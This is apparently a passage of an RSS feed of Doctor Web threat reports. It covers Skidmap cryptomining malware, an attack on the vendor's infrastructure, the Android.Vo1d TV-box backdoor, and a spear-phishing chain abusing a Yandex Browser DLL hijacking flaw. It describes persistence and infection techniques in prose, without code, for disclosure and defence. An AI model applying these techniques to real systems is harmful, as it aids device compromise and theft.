&lt;p&gt;To increase their ability to control a compromised system, the attackers install the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.RCTL.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt; remote access trojan. It allows commands to be sent to the infected machine and data to be exfiltrated via the encrypted connection that the trojan itself initiates, thus bypassing the routing problem.&lt;/p&gt;

&lt;p&gt;The xmrig program is installed as a miner that can mine a number of cryptocurrencies, the most famous of which is Monero, which has gained popularity on the darknet due to its complete anonymity at the transaction level. It should be said that detecting a rootkit-covered miner in a cluster of servers is no trivial task. If the diagnostic data are spoofed, the only thing that might indicate a compromise is excessive power consumption and increased heat generation. However, to somewhat mitigate that, attackers can also tweak the miner's settings to find an optimal balance between mining performance and preserving hardware performance, thus drawing less attention to a compromised system.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;The evolution of the Skidmap malware family can be seen in the increasing complexity of the attack chain: the launched programs call each other, disable security systems, interfere with a large number of system utilities and services, download rootkits, etc., which makes it much more difficult to respond to such incidents.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/skidmap" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.144&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.144&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14907&amp;lng=en</guid><title>Doctor Web resumed  virus database updates after the  attack on its infrastructure</title><link>https://news.drweb.com/show/?i=14907&amp;lng=en&amp;c=23</link><pubDate>Wed, 18 Sep 2024 15:49:02 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;September 18, 2024&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Now that the dangerous situation involving the attack on Doctor Web's infrastructure has been resolved successfully, we're happy to bring you up to speed on the latest developments and present the security incident's complete timeline.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The attack on our infrastructure began on Saturday, &lt;b&gt;September 14, 2024&lt;/b&gt;.&lt;/p&gt;
&lt;p&gt;We were monitoring it closely and maintained control over the situation.&lt;/p&gt;
&lt;p&gt;On &lt;b&gt;September 16, 2024&lt;/b&gt;, Doctor Web’s information security team detected signs of unauthorised interference with our IT infrastructure.&lt;/p&gt;
&lt;p&gt;Following established security policies, we disconnected all our servers from the network and initiated comprehensive security diagnostics.
To analyse and eliminate the incident's consequences, we implemented a series of measures, including the use of Dr.Web FixIt! for Linux.
The gathered data allowed our security experts to successfully isolate the threat and ensure that our customers remained unaffected by it.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;September 16, 6:30 GMT&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;In accordance with our security policy, we temporarily disconnected certain nodes in Doctor Web's infrastructure from the Internet to perform additional checks. 
This resulted in a short-term interruption in the availability of Dr.Web virus database updates.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;September 17, 13:30 GMT&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Dr.Web virus database updates resumed in full.
None of Doctor Web’s customers have been affected by the incident.&lt;/p&gt;
&lt;br/&gt;
&lt;p&gt;We continue to adhere to the highest information security standards and promptly take whatever measures are necessary to ensure the stable operation of all our systems and services.&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14904&amp;lng=en</guid><title>Doctor Web's resources attacked</title><link>https://news.drweb.com/show/?i=14904&amp;lng=en&amp;c=23</link><pubDate>Tue, 17 Sep 2024 14:47:28 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;September 17, 2024&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;On Saturday, September 14, Doctor Web specialists recorded a targeted attack on the company's resources. The attempt to harm our infrastructure was prevented in a timely manner, and no user whose system was protected by Dr.Web was affected.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;
For the time being, in accordance with the company’s security protocol, all resources are disconnected from the network so that they can be checked. Because of this, the release of Dr.Web virus databases is temporarily suspended. A special pre-release version of our Dr.Web FixIt! service for Linux is being used to diagnose and eliminate the consequences of the attack, which allows us to scan our resources more quickly. The release of virus databases will resume shortly.&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14900&amp;lng=en</guid><title>Void captures over a million Android TV boxes</title><link>https://news.drweb.com/show/?i=14900&amp;lng=en&amp;c=23</link><pubDate>Thu, 12 Sep 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;September 12, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web experts have uncovered yet another case of an Android-based TV box infection. The malware, dubbed &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, has infected nearly 1.3 million devices belonging to users in 197 countries. It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In August 2024, Doctor Web was contacted by several users whose Dr.Web antivirus had detected changes in their device’s system file area. The problem occurred with these models:&lt;/p&gt;

&lt;table class="Table"&gt;
    &lt;thead&gt;
      &lt;tr&gt;
        &lt;th&gt;TV box model&lt;/th&gt;
        &lt;th&gt;Declared firmware version&lt;/th&gt;
      &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td&gt;R4&lt;/td&gt;
        &lt;td&gt;Android 7.1.2; R4 Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;TV BOX&lt;/td&gt;
        &lt;td&gt;Android 12.1; TV BOX Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;KJ-SMART4KVIP&lt;/td&gt;
        &lt;td&gt;Android 10.1; KJ-SMART4KVIP Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;All these cases involved similar signs of infection, so we will describe them using one of the first requests we received as an example. The following objects were changed on the affected TV box:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In addition, 4 new files emerged in its file system:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/vo1d&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/wd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd_real&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;vo1d&lt;/span&gt; and &lt;span class="string"&gt;wd&lt;/span&gt; files are the components of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan that we discovered.&lt;/p&gt;

&lt;blockquote&gt;
  The trojan’s authors probably tried to disguise one of its components as the system program /system/bin/vold by giving it the similar-looking name “vo1d” (substituting the lowercase letter “l” with the digit “1”). The malicious program’s name comes from the name of this file. Moreover, this spelling is consonant with the English word “void”.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; file is a script that is present on most Android devices. It runs when the operating system is launched and contains data for autorunning the elements specified in it. If any malware has root access and the ability to write to the &lt;span class="string"&gt;/system&lt;/span&gt; system directory, it can anchor itself in the infected device by adding itself to this script (or by creating it from scratch if it is not present in the system). &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; has registered the autostart for the &lt;span class="string"&gt;wd&lt;/span&gt; component in this file.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" alt="The modified install-recovery.sh file"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The modified install-recovery.sh file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;daemonsu&lt;/span&gt; file is present on many Android devices with root access. It is launched by the operating system when it starts and is responsible for providing root privileges to the user. &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; registered itself in this file, too, having also set up autostart for the &lt;span class="string"&gt;wd&lt;/span&gt; module.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;debuggerd&lt;/span&gt; file is a daemon that is typically used to create reports on occurred errors. But when the TV box was infected, this file was replaced by the script that launches the &lt;span class="string"&gt;wd&lt;/span&gt; component.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; file in the case we are reviewing is a copy of the script that was used to substitute the real &lt;span class="string"&gt;debuggerd&lt;/span&gt; file. Doctor Web experts believe that the trojan’s authors intended the original &lt;span class="string"&gt;debuggerd&lt;/span&gt; to be moved into &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; to maintain its functionality. However, because the infection probably occurred twice, the trojan moved the already substituted file (i.e., the script). As a result, the device had two scripts from the trojan and not a single real &lt;span class="string"&gt;debuggerd&lt;/span&gt; program file.&lt;/p&gt;

&lt;p&gt;At the same time, other users who contacted us had a slightly different list of files on their infected devices:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt; (the &lt;span class="string"&gt;vo1d&lt;/span&gt; file analogue — &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd&lt;/span&gt; (the same script as described above);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd_real&lt;/span&gt; (the original file of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; tool);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; (a script that loads objects specified in it).  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;An analysis of all the aforementioned files showed that in order to anchor &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; in the system, its authors used at least three different methods: modification of the &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; and &lt;span class="string"&gt;daemonsu&lt;/span&gt; files and substitution of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; program. They probably expected that at least one of the target files would be present in the infected system, since manipulating even one of them would ensure the trojan’s successful auto launch during subsequent device reboots.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;’s main functionality is concealed in its &lt;span class="string"&gt;vo1d&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;) and &lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;) components, which operate in tandem. The &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt; module is responsible for &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;’s launch and controls its activity, restarting its process if necessary. In addition, it can download and run executables when commanded to do so by the C&amp;C server. In turn, the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; module installs and launches the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt; daemon that is encrypted and stored in its body. This module can also download and run executables. Moreover, it monitors specified directories and installs the APK files that it finds in them.&lt;/p&gt;

&lt;p&gt;A study conducted by Doctor Web malware analysts showed that the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor has infected around 1.3 million devices, while its geographical distribution included almost 200 countries. The largest number of infections were detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Countries with the highest number of infected devices detected" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Countries with the highest number of infected devices detected&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One possible reason why the attackers distributing &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; specifically chose TV boxes is that such devices often run on outdated Android versions, which have unpatched vulnerabilities and are no longer supported with updates. For example, the users who contacted us have models that are based on Android 7.1, despite the fact that for some of them the configuration indicates much newer versions, such as Android 10 and Android 12. Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive.&lt;/p&gt;

&lt;p&gt;In addition, users themselves may mistakenly perceive TV boxes to be better protected devices than smartphones. As a result, they install anti-virus software on these devices less often and risk encountering malware when downloading third-party apps or installing unofficial firmware.&lt;/p&gt;

&lt;p&gt;At the moment, the source of the TV boxes’ backdoor infection remains unknown. One possible infection vector could be an attack by an intermediate malware that exploits operating system vulnerabilities to gain root privileges. Another possible vector could be the use of unofficial firmware versions with built-in root access.&lt;/p&gt;

&lt;p&gt;Dr.Web anti-virus for Android successfully detects all known &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan variants, and, if root access is available, cures the infected devices.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Vo1d/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14899&amp;lng=en</guid><title>Gaining persistence in a compromised system using Yandex Browser. Failed spear phishing attack on Russian rail freight operator.</title><link>https://news.drweb.com/show/?i=14899&amp;lng=en&amp;c=23</link><pubDate>Wed, 04 Sep 2024 04:00:00 GMT</pubDate><description>&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/Study_of_a_targeted_attack_on_a_Russian_rail_freight_operator_en.pdf" class="Btn bg_main_green_5 widthCaptcha"&gt;
    &lt;span class="Btn-body icon icon_right" data-icon="#common-arrowRight"&gt;
      &lt;span class="Btn-text"&gt;Download PDF&lt;/span&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/p&gt;


&lt;p&gt;&lt;b&gt;September 4, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Social engineering is a highly effective fraud technique that is difficult to withstand. A skilled attacker knows how to find the right approach to intimidate or persuade a victim to perform an action. But what if an attack requires little communication effort, and a computer stops being a digital assistant and becomes an unwitting accomplice?&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Spear phishing is a popular method of delivering malware to computers in large organizations. It differs from regular phishing in that the attackers gather information in advance and personalize the message they send to encourage the victim to perform an action that will result in a security breach. The primary targets are either high-level employees with access to valuable information, or employees in departments that interact with multiple recipients. This is especially true for HR staff who receive many emails from strangers that have attachments in a variety of formats. This is the attack vector of choice for the threat actors in the case we are about to discuss.&lt;/p&gt;

&lt;p&gt;In March 2024, a large Russian company in the rail freight industry contacted Doctor Web. A suspicious email with an attachment caught the attention of their information security department. After trying to determine the threat posed by the attached file, they contacted our specialists. After reviewing the request, our analysts concluded that the company had almost been the victim of spear phishing. The goal of the perpetrators was to gather system information and launch modular malware on a compromised PC.&lt;/p&gt;

&lt;p&gt;To carry out the attack, the criminals sent a phishing email disguised as a jobseeker's résumé to the company's email address. Attached to the email was an archive that purported to contain a PDF job application. That file had the so-called “double” extension &lt;span class="string"&gt;.pdf.lnk&lt;/span&gt;. Hiding malicious objects by using double extensions is a common tactic employed by attackers to fool their victims. By default, Windows hides file extensions as a convenience to the user, and when a file has a “double” extension, the system hides only the last one. In this case, the victim could see the first extension—&lt;span class="string"&gt;.pdf&lt;/span&gt;—while the &lt;span class="string"&gt;.lnk&lt;/span&gt; extension was hidden. Moreover, even if the display of full filenames is enabled, the &lt;span class="string"&gt;.lnk&lt;/span&gt; extension is always hidden by the operating system.&lt;/p&gt;

&lt;blockquote&gt;The idea of compromising systems using lnk files is not new. The most notable attack occurred in 2010, when uranium enrichment facilities in the Iranian city of Natanz suffered an unprecedented cyberattack. A worm called Stuxnet attacked the PLCs that controlled gas centrifuges, spinning them to extreme speeds and then stopping abruptly, destroying their casings. In addition to damaging the equipment, the worm infected more than 200,000 computers in many countries around the world. The primary attack vector was an lnk file that ended up on a USB drive on a corporate control computer. To run the malicious program, the user simply had to navigate to the folder containing the weaponized lnk file. The attack exploited four zero-day vulnerabilities, most notably the CPLINK exploit, which allowed the Stuxnet worm to launch without user involvement.&lt;/blockquote&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/malicious_pdf_lnk.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/malicious_pdf_lnk.1.png" alt="Metadata stored in an lnk file"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Metadata stored in an lnk file&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;The real extension, &lt;span class="string"&gt;.lnk&lt;/span&gt;, is the extension for Windows shortcuts. In a shortcut's Target field, you can specify the path to any operating system object, such as an executable file, together with the parameters it should be run with. In this attack, the shortcut covertly launched the PowerShell command prompt, which downloaded two malicious scripts from the attackers' website, each of which launched its own payload.&lt;/p&gt;
 
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/Attack chain_EN.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/Attack chain_EN.1.png" alt="Attack chain"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Attack chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first payload consisted of a decoy PDF file and an executable called &lt;span class="string"&gt;YandexUpdater.exe&lt;/span&gt;, which posed as a component for updating Yandex Browser (the real component is named &lt;span class="string"&gt;service_update.exe&lt;/span&gt;). This executable is a malware dropper, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.46324&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.46324&lt;/b&gt;&lt;/a&gt;, which, after running a series of checks for an emulated environment and for the presence of debugging software, unpacks &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen28.53599&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen28.53599&lt;/b&gt;&lt;/a&gt; on the compromised system. The latter has remote control capabilities, collects system information and downloads various malicious modules. It also has anti-debugging capabilities of its own: if antivirus, virtual machine or debugger processes are detected, the trojan overwrites its file with zeros and then deletes both the file and the folder in which it was stored.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/decoy_pdf.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/decoy_pdf.1.png" alt="Decoy PDF file"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Decoy PDF file&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;The second payload consisted of a decoy PDF file and &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen27.11306&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen27.11306&lt;/b&gt;&lt;/a&gt;. This trojan is a dynamic-link library (DLL) with an encrypted payload. Its distinctive feature is that it exploits a DLL Search Order Hijacking vulnerability in Yandex Browser. In Windows, DLL files are libraries in which applications keep functions, variables and interface elements. When an application starts, it searches for the libraries it needs in several locations in a fixed order, so attackers can try to “jump the queue” by placing a malicious library in a location that is searched before the one holding the legitimate DLL.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/DLL Search Order_EN.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/DLL Search Order_EN.1.png" alt="Simplified DLL search prioritization scheme"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Simplified DLL search prioritization scheme&lt;/em&gt;&lt;/p&gt;
 
&lt;p&gt;This trojan is stored in the hidden &lt;span class="string"&gt;%LOCALAPPDATA%\Yandex\YandexBrowser\Application&lt;/span&gt; folder under the name &lt;span class="string"&gt;Wldp.dll&lt;/span&gt;. This is the directory where Yandex Browser is installed and where the browser looks for the libraries it needs at startup. In turn, the legitimate &lt;span class="string"&gt;Wldp.dll&lt;/span&gt; library, whose function is to ensure the security of application startup, is an OS system library and is located in the &lt;span class="string"&gt;%WINDIR%\System32&lt;/span&gt; folder. Since the malicious library is located in the Yandex Browser installation folder, it is loaded first. At the same time, it gets all the permissions of the main application: it can execute commands and create processes on behalf of the browser, as well as inherit firewall rules for Internet access.&lt;/p&gt;

&lt;p&gt;After the browser is launched, the malicious Wldp.dll library decrypts the payload embedded in it. Note that decryption is performed twice: first with a key derived from the hash of the path where the malicious DLL is located, and then with a global key embedded in the body of the trojan. The result is shellcode whose execution lets the attackers run a .NET application on the compromised system. This executable, in turn, downloads malware from the network. Unfortunately, at the time of our investigation, the server that the downloader communicated with was down, so we were unable to determine which specific trojan was being downloaded in this case.&lt;/p&gt;

&lt;p&gt;Thus, we see a multi-vector, multi-stage infection scheme with two different trojans that are delivered to a compromised system when a file from a phishing email is opened. Despite the complexity of the implementation, preventing and protecting against such attacks is quite simple:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Raise employee awareness of information security issues (carefully check links and filenames, and do not open suspicious objects).&lt;/li&gt;
  &lt;li&gt;Use software products that perform email filtering, such as &lt;a href="https://products.drweb.com/mailserver/?lng=en" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Mail Security Suite&lt;/a&gt;, to prevent the delivery of malicious emails and attachments.&lt;/li&gt;
  &lt;li&gt;Install antivirus software, such as &lt;a href="https://products.drweb.com/workstations/?lng=en" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Desktop Security Suite&lt;/a&gt; and &lt;a href="https://products.drweb.com/fileserver/?lng=en" target="_blank" rel="noopener noreferrer"&gt;Dr.Web Server Security Suite&lt;/a&gt;, on all network nodes, which will prevent a dangerous file from getting through when users are working on the Internet or block suspicious activities on user computers if a file was delivered on a USB drive.&lt;/li&gt;
  &lt;li&gt;Regularly apply software updates that fix program bugs.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Having discovered this vulnerability in Yandex Browser, we submitted our findings to Yandex. The developers promptly released an updated version of Yandex Browser (24.7.1.380) where this vulnerability (&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6473" target="_blank" rel="noopener noreferrer"&gt;CVE-2024-6473&lt;/a&gt;) is fixed.&lt;/p&gt;

&lt;p&gt;To ensure the safety of Yandex Browser users, we have coordinated the release date of this article with browser developers to allow users to upgrade to a patched version of Yandex Browser before the details of this attack are made public.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/APT_rail_transportation_operator/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
